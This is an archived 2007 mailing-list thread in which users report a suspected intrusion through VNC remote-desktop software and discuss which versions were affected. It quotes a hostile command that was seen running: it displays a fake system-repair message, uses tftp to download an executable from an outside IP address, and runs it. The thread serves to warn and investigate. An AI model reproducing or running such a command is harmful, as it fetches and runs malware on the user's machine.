This happened to me several months ago. I upgraded to the latest version of RealVNC and the problem hasn't occurred since. It appeared that someone was trying to execute code on my machine to do something nefarious... I'm now running RealVNC's VNC Server Free Edition 4.1.2 built on May 12 2006 at 14:47:22. So, I think this is an "old" problem that seems to have been fixed for almost a year. Carey ----- Original Message ----- From: "Russell McMahon" To: "PIC List" Sent: Friday, April 13, 2007 7:41 AM Subject: [OT]:: VNC heads up <- Fw: intrusion? / VNC users only. > > Don't use VNC (or know what it is)* ? - ignore this > > __________ > > I don't know whether this is significant but it sounds so. > VNC users may wish to take note. > > > Russell > > _______________________ > >>>>>> Eusebio wrote: > >> My pc (xp pro sp2) is usually on and connected, and I often use >> tight-vnc, everything OK till I found this (see image) >> >> Someone executed this code: %comspec% /c echo Repairing user32.dll >> echo Please wait... & tftp -i 64.79.213.12 GET >> jijrtyw.exe & start jijrtyw& >> >> as a server address in 'TightVNC Viewer', appears an error message: >> "Failed to get server address" >> >> but a cmd.exe window was open and that code was executed > > I'm trying to investigate this issue, but I do not understand yet how > that could be possible. > > Do you have other VNC versions installed? Specifically, could it be > possible that you run RealVNC's version 4.1.1? > > While searching the Internet, I was able to find a number of reports > similar to this one (even the IP address was the same in many cases), > but what was strange is that versions and distributions of VNC > software > were different in different reports - TightVNC, UltraVNC, VNC4. > > Another strange thing is that VNC viewer is involved, while VNC server > is needed to connect to the machine. Are both server and viewer > vulnerable? -- I think that's not likely. Looks very strange... > > > -- > http://www.piclist.com PIC/SX FAQ & list archive > View/change your membership options at > http://mailman.mit.edu/mailman/listinfo/piclist > > > > -- > No virus found in this incoming message. > Checked by AVG Free Edition. > Version: 7.5.446 / Virus Database: 269.3.0/758 - Release Date: 4/12/2007 > 11:52 AM > > -- http://www.piclist.com PIC/SX FAQ & list archive View/change your membership options at http://mailman.mit.edu/mailman/listinfo/piclist